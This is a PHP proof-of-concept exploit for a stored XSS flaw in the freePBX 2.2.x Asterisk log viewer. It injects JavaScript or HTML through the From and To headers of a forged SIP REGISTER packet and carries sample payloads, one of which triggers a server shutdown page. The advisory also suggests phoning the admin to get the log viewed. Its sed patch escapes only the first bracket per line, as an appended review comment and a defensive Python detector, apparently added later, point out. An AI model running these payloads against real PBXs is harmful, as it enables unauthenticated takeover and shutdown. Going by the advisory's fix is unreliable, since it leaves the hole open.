#!/usr/bin/php
<?php
/*

 \ | | | | | _)
 |\/ | _ \ __| __ \ | | |\ \ / _` | __ \ __| | __ \ _` |
 | | __/ | | | | | | | ` < ( | | | | | | | ( |
 _| _|\___|\__|_| |_|\__, |_| _/\_\\__,_|_| _|\__|_|_| _|\__,_|
 ____/
 ___ \ ___| / Methylxantina 256mg
 ) | __ \ _ \ __ `__ \ _` | http://xenomuta.blogspot.com
 __/ ) | ( | | | | ( |
 _____|____/ \___/ _| _| _|\__, | freePBX 2.2.x full-log XSS PoC
 |___/ by XenoMuta <xenomuta@phreaker.net>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ISSUE:
SIP protocol fields such as From, To, Call-ID, User-Agent (and many others)
can carry HTML tags, which are shown unfiltered by the Asterisk Log File tools
located at http://<freepbx root>/admin/modules/logfiles/asterisk-full-log.php,
resulting in malicious HTML or Javascript code injection.

IMPACT:
Server shutdown/restart, PBX control and possible remote code execution through
amportal options. Just about anything you can code in Javascript.
* Note that the amportal admin will only see the last 2000 lines of the full log,
  for which an attacker might call the admin asking for support at the time of
  exploitation. This doesn't require authentication or valid credentials >:)

WARNING:
* Do this at your own risk. Intended for research and educational purposes ONLY.
* Neither the author nor Methylxantine 256mg is accountable for your actions.
* Running this will taint your log file. Make sure you clean it after a test.

FIX:
Here is a way to fix the problem.

[root@asterisk1 ~]# cd /var/www/html/admin/modules/logfiles
[root@asterisk1 logfiles]# cat<<EOF|patch
*** asterisk-full-log.php 2007-04-18 12:51:10.000000000 -0400
--- asterisk-full-log.php.fixed 2007-04-18 12:51:18.000000000 -0400
***************
*** 10,16 ****
 <hr>
 <br>
 <?
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/$/<br>/"');
 ?>
 
 </body>
--- 10,16 ----
 <hr>
 <br>
 <?
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/</\&lt;/;s/>/\&gt;/" | sed -e "s/$/<br>/"');
 ?>
 
 </body>
EOF


PAYOLA AND GREETS:
:)
gr33tz to:
- God, for being so faithful.
- Lili, for the late-night patience and for your love
- the Asterisk team and the freePBX team, for such an EXCELLENT product
- EMRA, for the fragrance
- Leo, I gave you Light


*/

print "\x1bc\n\x1b[1m\x1b[30m\x1b[47m";
print " \n";
print " \r";
print " \\ | | | | | _) \n";
print " \r";
print " |\\/ | _ \\ __| __ \\ | | |\\ \\ / _` | __ \\ __| | __ \\ _` |\n";
print " \r";
print " | | __/ | | | | | | | ` < ( | | | | | | | ( |\n";
print " \r";
print " _| _|\\___|\\__|_| |_|\\__, |_| _/\\_\\\\__,_|_| _|\\__|_|_| _|\\__,_|\n";
print " \r";
print " ____/ \n";
print " \r";
print " ___ \\ ___| / Methylxantina 256mg\n";
print " \r";
print " ) | __ \\ _ \\ __ `__ \\ _` | http://xenomuta.blogspot.com\n";
print " \r";
print " __/ ) | ( | | | | ( | \n";
print " \r";
print " _____|____/ \\___/ _| _| _|\\__, | freePBX 2.2.x full-log XSS PoC\n";
print " \r";
print " |___/ by XenoMuta <xenomuta@phreaker.net>\n";
print " \n\x1b[0m";


//COMMENT ME TO PROCEED
//die("\x1b[31mWe urge you to read the code first. Comment this line to proceed.\n\x1b[0m");


if($argc<2) die("\nUsage: $argv[0] <sip proxy> [custom payload]\n\n");
$sipp=$argv[1];


if($argc<3){
//SOME SAMPLE PAYLOADS FOR YOUR PLEASURE

//Execute external Payload (this one only possible with Call-id payload)
$payload="<script>var body=document.getElementsByTagName('body');var fly= new Image(), ofly=new Image(), ifly=new Image();ifly.src='http://xenmut.100webspace.net/fly2.png';ofly.src='http://xenmut.100webspace.net/fly1.png';ofly.onload=eval('var mv=setInterval(\'move()\',10);');fly.setAttribute('id','fly');fly.style.position='absolute;';fly.style.left='300';fly.style.top='100';body[0].appendChild(fly);var ang,s=2,xx,yy,cal,pi=3.1415926535,ala=true;function calma(){s=2;clearInterval(cal);}function move() {var x,y;x=(s*(Math.sin(ang)));y=(s*(Math.cos(ang)));ala=!ala;if(ala) fly.src=ifly.src;else fly.src=ofly.src;if(Math.round(100*Math.random())>96)ang+=ala?5:-5;if((xx+x>1024)||(xx+x<0)||(yy+y>800)||(yy+y<0)){ang=Math.round(360*Math.random());}else{xx+=x;yy+=y;}fly.style.left=xx+'px';fly.style.top=yy+'px';}function main(){ang=Math.round(360*Math.random());xx=620;yy=400;fly.onmouseover=function(){s=10;ang=Math.round(360*Math.random());clearInterval(cal);cal=setInterval('calma()',500);}}main();</script>";

//Space Invader (this one only possible with Call-id payload)
//$payload="<img width=900 src=http://www.i-marco.nl/weblog/images/SpaceInvader.jpg>";

// Server shutdown Payload
/*
 .oOOOo. Oo O o oOoOOoOOo ooOoOOo .oOOOo. o. O
.O o o O o O o O .O o. Oo o
o O o O o o o O o O O O
o oOooOoOo o o O O o O O o o
o o O o O o o O o O o O
O O o O O O O o O o O O
`o .o o O `o Oo O O `o O' o Oo
 `OoooO' O. O `OoooO'O o' ooOOoOo `OoooO' O `o
*/
//$payload='<img src="../sysstatus/shutdown.php">';
} else {
 $payload=$argv[2];
}

$ext=1234;
$agent="SJphone v1.0";
$udp=fsockopen("udp://$sipp",5060);
$seq=rand(10000,99900);
$packet = "REGISTER sip:$sipp SIP/2.0\n".
"Via: SIP/2.0/UDP $sipp:5060;rport;branch=z9hG4bK12345\n".
"From: $payload\n".
"To: $payload\n".
"Contact: \"$ext\" <sip:$ext@$sipp:5060>\n".
"Call-ID: 12345@$sipp\n".
"CSeq: 12345 REGISTER\n".
"Expires: 1800\n".
"Max-Forwards: 70\n".
"User-Agent: $agent\n".
"Content-Length: 0\n\n";
fputs($udp,$packet);
fclose($udp);
die("\nPAYLOAD SENT:\n$payload\n");

?>
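Review bot: the replacement line in the `--- 10,16 ----` hunk of the FIX patch escapes only the first `<` and the first `>` on each log line, because `s/</\&lt;/;s/>/\&gt;/` carries no `g` flag, and `&` is never escaped; a log line holding `<script>...</script>` therefore still reaches the browser with its closing tag intact, and one holding a literal `&lt;` is decoded into `<`. Do the escaping in PHP over the whole output rather than in the shell pipeline, e.g. `echo nl2br(htmlspecialchars(shell_exec('tail -n 2000 /var/log/asterisk/full')));`, which escapes every occurrence and the quote characters as well. Note also that `echo system(...)`, in both the old and new line, prints the output once from `system()` and then echoes its return value (the last line) a second time.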
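Added as an example that is not part of XenoMuta's PoC or of freePBX: a detector that flags HTML markup in the SIP header values Asterisk writes to the full log (the headers the advisory names, plus the chan_sip registration notice that quotes the From header), while leaving legitimate `<sip:...>` URIs alone, next to a mirror of the advisory's sed fix and the complete escaping the viewer should perform. The log lines, host names and addresses are constructed.

```python
"""Added example (not from the advisory or freePBX): flag HTML markup in SIP header
values Asterisk writes to /var/log/asterisk/full, and escape the log correctly."""
import html
import re

# Headers the advisory calls attacker-controlled; Contact is an added assumption.
SIP_HEADERS = {"from", "to", "call-id", "user-agent", "contact"}
# A raw SIP header line, as dumped into the log when 'sip debug' is enabled.
HEADER_RE = re.compile(r"^\s*(?P<name>[A-Za-z][A-Za-z0-9-]*):\s*(?P<value>.*)$")
# chan_sip also quotes the From header in its registration-failure notice.
REG_RE = re.compile(r"Registration from '(?P<value>.*)' failed for")
# Angle-bracketed SIP/SIPS/TEL URIs are legitimate in From/To/Contact ...
SIP_URI_RE = re.compile(r"<\s*(?:sips?|tel):[^<>]*>")
# ... anything else that opens like a markup tag is not.
TAG_RE = re.compile(r"<\s*/?[A-Za-z!]")

def is_suspicious_value(value):
    """True if markup remains once legitimate SIP URIs are removed."""
    stripped = SIP_URI_RE.sub("", value)
    return bool(TAG_RE.search(stripped)) or "javascript:" in stripped.lower()

def scan_log(lines):
    """Return (line_no, header, value) for every header value carrying markup."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = HEADER_RE.match(line)
        if m and m.group("name").lower() in SIP_HEADERS:
            name, value = m.group("name"), m.group("value")
        elif (m := REG_RE.search(line)):
            name, value = "From", m.group("value")
        else:
            continue
        if is_suspicious_value(value):
            findings.append((no, name, value))
    return findings

def sed_style_escape(line):
    """Mirror of the advisory's sed fix: only the FIRST '<' and '>' per line change."""
    return line.replace("<", "&lt;", 1).replace(">", "&gt;", 1)

def render_log_html(lines):
    """What the viewer should do: escape every <, >, & and quote, then add <br>."""
    return "".join(html.escape(line) + "<br>\n" for line in lines)

SAMPLE_LOG = [  # constructed; not captured from a real PBX
    "[Apr 18 12:51:10] VERBOSE[2811] chan_sip.c: ",
    "<--- SIP read from 192.0.2.10:5060 --->",
    'From: "1234" <sip:1234@pbx.example.test>',
    "To: <sip:1234@pbx.example.test>",
    "User-Agent: SJphone v1.0",
    "Call-ID: <script>alert(1)</script>@pbx.example.test",
    "[Apr 18 12:51:11] NOTICE[2811] chan_sip.c: Registration from "
    "'<b>1234</b> <sip:1234@pbx.example.test>' failed for '192.0.2.10' - No matching peer found",
]
```

Running `scan_log(SAMPLE_LOG)` reports lines 6 and 7 only; the From and To lines with real SIP URIs are not flagged, and `sed_style_escape` shows why the one-substitution sed fix leaves the closing `</script>` untouched.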